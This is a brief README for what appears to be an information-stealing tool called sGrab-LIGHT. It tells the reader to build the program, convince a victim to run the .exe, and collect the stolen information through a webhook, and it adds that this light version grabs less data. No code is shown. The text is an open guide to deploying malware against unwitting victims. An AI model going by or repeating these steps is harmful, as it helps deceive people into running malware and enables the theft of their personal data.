Stacksy/sGrab-LIGHT/README.md

 - Build the solution
 - Convince your victim to run the .exe
 - The info will be displayed by the webhook

+THIS IS A LIGHTER VERSION, IT WILL GRAB LESS INFO